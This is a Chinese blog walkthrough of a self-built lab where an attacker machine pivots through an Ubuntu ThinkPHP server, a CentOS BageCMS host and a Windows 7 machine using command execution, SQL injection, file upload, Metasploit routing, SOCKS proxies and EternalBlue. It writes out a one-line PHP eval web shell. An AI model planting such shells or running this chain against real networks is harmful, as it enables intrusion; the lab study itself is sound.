当前位置: 首页 > news >正文

记一次学习--内网穿透

目录

环境搭建

两张网卡如何配置

Ubuntu配置

渗透

ubuntu的拿下

centos的拿下

探测内网环境

fscan扫描

msf上马

渗透

拿下bage cms

windows的拿下

​编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

​编辑


环境搭建

准备四台虚拟机

一台虚拟机模拟攻击者,一台kali

三台虚拟机模拟内网环境,一台ubuntu、一台centos、一台window7

kali:这台虚拟上有一张网卡
IP:192.168.244.129(nat)

ubuntu:这台虚拟机上有两张网卡一张是NAT模式,一张是主机模式。
IP:192.168.244.154(nat)、192.168.116.128(主机模式)

centos:这台虚拟机上也有两张网卡一张是主机模式、一张是自定义模式
IP:192.168.116.129(主机模式)、192.168.110.128(自定义模式)

window:这台虚拟机上只有一张网卡
IP:192.168.110.129(自定义模式)

两张网卡如何配置

在编辑中寻找虚拟网络编辑器

三张网卡设置不同网段,如下图

我这里设置的是VMnet8是NAT模式模拟可以访问外网的网段

VMnet1和VMnet0设置的是仅主机模式模拟内网

然后再虚拟机中设置网卡,选择不同的模式,即可完成虚拟机中两张网卡的设置

配置完成网络后kali可以ping通Ubuntu的192.168.244.154,Ubuntu可以ping通centos的192.168.116.129,centos可以ping通windows的192.168.110.129

kali ping ubuntu

ubuntu ping centos

centos ping Windows

Ubuntu配置

这台虚拟机上部署了thinkphp5.0.15的版本,我们一会要借助thinkphp5.0.15上的漏洞进行渗透

渗透

ubuntu的拿下

首先查看网站,这里是thinkphp5.0的版本,说不定会有对应的漏洞。经过查找确实有一个命令执行漏洞

执行后进行测试

执行以下命令写入文件

echo '<?php eval($_POST[123]); ?>' >web.php

然后尝试蚁剑连接,连接成功

centos的拿下

我们在Ubuntu执行ip addr,发现ubuntu有两张网卡,猜测这里说不定有内网环境

探测内网环境

现在有两种方式上马一个msf,或者上传一个fscan

fscan扫描

将对应版本的fscan下载到你蚁剑连接的目标机器上

然后加权扫描,扫描过后多出了result文件,查看result文件。发现再116网段下还有一台机器也就是我们的centos,并且该设备开放了80端口

msf上马

显示系统名、节点名称、操作系统的发行版号、操作系统版本、运行系统的机器 ID 号。

msf生成木马

用python架设一个简单的http服务器

python3 -m http.server

获取木马后,然后将木马传递到你蚁剑连接的主机上

上传成功 

 加权执行

攻击者kali监听

然后由于116现在是内网,所以现在kali无法访问116网段,我们需要添加一条路由才可以访问,下图是路由情况

添加路由,这里由于现在的会话连接的是ubuntu,所以现在是可以通过会话建立到达116的路由的

然后可以创建一个代理服务器

 现在创建的代理是kali的1080端口,这个就相当于我们只要连接本地的1080端口就连接到了msf上面,然后就可以走到116的那个网段

在kali的proxychain中将代理设置好(目录/etc//etc/proxychains4.conf )

然后直接使用proxychains扫描80端口

扫描结果

渗透

我们这里搭建了代理服务器所以可以借助火狐来直接访问,在火狐的设置中设置代理

进入设置

进入代理设置

设置代理,这里的代理就是你在proxychain中设置的代理,你选的那个版本就要那个版本,刚刚在代理中选的是sock 4a所以这里就选4a

设置代理之后就可以访问内网网址了

拿下bage cms

我们首先看一下robots.txt文件

进入目录/index.php?r=admin,进入了cms的后台,在这里可以尝试以下密码爆破

或者密码喷撒,我这里没有尝试

 这里有一个sql注入漏洞

将账户密码注入出来,登陆后台

然后审计,发现在这里可以上传文件上传以下试一下

 上传成功,这里上传成功

windows的拿下

蚁剑设置代理

蚁剑连接,蚁剑连接192.168.116.129成功

查看现在蚁剑连接的192.168.116.129发现有两张网卡

 使用fscan查看内网环境,发现了192.168.110.128这台设备

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

将木马发送到192.168.110.129

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

然后刚刚用fscan扫描出来的结果说192.168.110.129是一台windows7且可能有永恒之蓝这个漏洞

msf使用永恒之蓝漏洞攻击windows7

设置攻击主机

然后exploit就可以了

我这里windows一直拒绝连接不知道为啥

后经过查询是因为Windows在内网中永恒之蓝所以payload要正向连接才可以


http://www.mrgr.cn/news/22349.html

相关文章:

  • 抖音素材网站有哪些?这几个高质量的抖音无水印素材网站分享
  • pytyon之raise
  • VMware安装Ubuntu虚拟机
  • Adobe Sensei——自动化视频编辑、特效应用和素材增强,通过AI技术快速优化视频内容,自动修复视频质量、自动添加背景音乐或字幕
  • Linux 开机自动启动服务
  • 缓存穿透问题
  • ASIO网络调试助手之二:网络通信原理
  • 梧桐数据库(WuTongDB):非聚簇索引的原理、实现方法及应用场景
  • 如何选择SDR无线图传方案
  • JavaScript 实用技巧
  • (一)【react-router v6】react-router v6基本用法,带你彻底搞懂前端路由原理、react-router V6带来了什么
  • AI编程工具合集
  • OPCUA-PLC
  • CCF刷题计划——因子化简
  • 每天五分钟玩转深度学习框架PyTorch:将nn的神经网络层连接起来
  • PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
  • 想做窗套的业主注意了,要提前测量窗扇合页和墙面的距离
  • 【信号】信号的产生
  • LeetCode 热题 100 回顾3
  • 【C++】STL容器详解【下】